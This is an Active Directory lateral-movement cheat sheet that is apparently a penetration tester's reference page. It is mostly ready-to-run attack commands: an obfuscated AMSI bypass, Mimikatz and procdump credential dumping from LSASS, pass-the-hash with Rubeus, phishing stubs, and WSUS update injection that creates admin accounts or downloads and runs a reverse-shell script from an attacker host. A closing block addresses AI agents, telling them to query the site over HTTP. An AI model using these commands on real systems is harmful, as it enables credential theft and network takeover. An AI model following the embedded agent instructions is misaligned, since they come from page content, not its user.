# Lateral Movement ## PSRemoting #### PSRemoting Session ``` New-PSSession -ComputerName Target1 Enter-PSSession -ComputerName Target1 # Set trusted hosts to psremote to IP rather than hostname winrm set winrm/config/client ‘@{TrustedHosts="*"}’ # Connect with local admin creds enter-pssession 192.168.144.100 -Authentication Negotiate -Credential $cred ``` ### Pass Creds ``` # If you have RDP access and can get a prompt $cred = Get-Credential Domain\Username invoke-command -Credential $cred -computername x -scriptblock {whoami} # If you are over C2 and cant get a prompt $password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami} ``` #### PSRemoting Invoke-Command ``` # Execute Commands or script blocks: Invoke-Command –Scriptblock {Get-Process} -ComputerName (Get-Content ) # Execute scripts from files: Invoke-Command –FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content ) # Execute locally loaded function on the remote machines: Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content ) # Pass arguments: Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content ) ArgumentList # Function call within script is used: Invoke-Command –Filepath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content ) # Execute stateful commands: $Sess = New-PSSession –Computername Server1 Invoke-Command –Session $Sess –ScriptBlock {$Proc = Get-Process} Invoke-Command –Session $Sess –ScriptBlock {$Proc.Name} ``` #### Stateful Mimikatz ``` $sess = new-pssession -computername server1 Invoke-Command -session $sess -scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )} Invoke-Command -session $sess -Filepath C:\Tools\Invoke-Mimikatz.ps1 Enter-PSSession -session $sess ``` #### Invoke-Mimikatz ``` # Dump Creds on local machine Invoke-Mimikatz -DumpCreds # Dump creds on multiple machines Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2") # "Over pass the hash" generate tokens from hashes Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm: /run:powershell.exe"' ``` ## Double Hop Problem ### PowerShell ``` $cred = Get-Credential DOMAIN\USER # Execute commands Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname}} # Copy files Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item .\procdump64.exe -Destination "C:\Documents\" -ToSession $sess2} # Dump Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname; .\procdump64.exe -accepteula -ma lsass.exe lsass.dmp}} # Copy dump back Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item "C:\Documents\lsass.dmp" -Destination "C:\Documents\" -FromSession $sess2} can use rubeus over double hop to extrat ticket then interact with 3rd system: Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname;.\Rubeus.exe ptt /ticket:doIAYArt ; ls \\COMP3\c$\}} ``` ### PsExec / Rubeus ``` # psexec to first host Psexec.exe -accepteula \\COMP -u USER -p cmd # Use rubeus on first host to overpass the hash and then access second host. # NOTE: using the /domain flag makes it unreliable. Rubeus.exe asktgt /user:USER /rc4: /ptt ``` ### Phish ``` # Generate HTA # Send Email Send-MailMessage -From 'User01 ' -To 'User02 ' -Subject 'Test mail' -SmtpServer AC-ITSTAFF # use Nishang to generate powershell phish payloads ``` ## Pass-The-Hash ``` runas /noprofile /netonly /user: powershell.exe Rubeus.exe asktgt /user:USER /rc4: /ptt Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm: /run:powershell.exe"' ``` ## PsExec ## WSUS #### Enumeration ``` # If you compromise a wsus server you can own a lot # See which comps connecting for updates (port 8530 = http, port 8531 = https) netstat -ano ``` #### Abuse ``` https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1 # Load psexec into directory and WSUSpendu # Send out malicious update to gain local admin on machine Wsuspendu.ps1 -Inject -PayloadFile psexec.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user Titi Password123_ /add && net localgroup Administrators Titi /add"' -ComputerName Win7.test.net # Compromise isolated networks with a reverse shell # Where Script is an amsi bypass plus a reverse shell connecting over 8531 .\Wsuspendu.ps1 -Inject -PayloadFile .\psexec.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "wget http://IP2:8531/Reverse.ps1 -UseBasicParsing -OutFile .\Reverse.ps1;.\Reverse.ps1"' -ComputerName # Listen on host and wait powercat -l -v -p 8531 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cheats.philkeeble.com/active-directory/lateral-movement.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.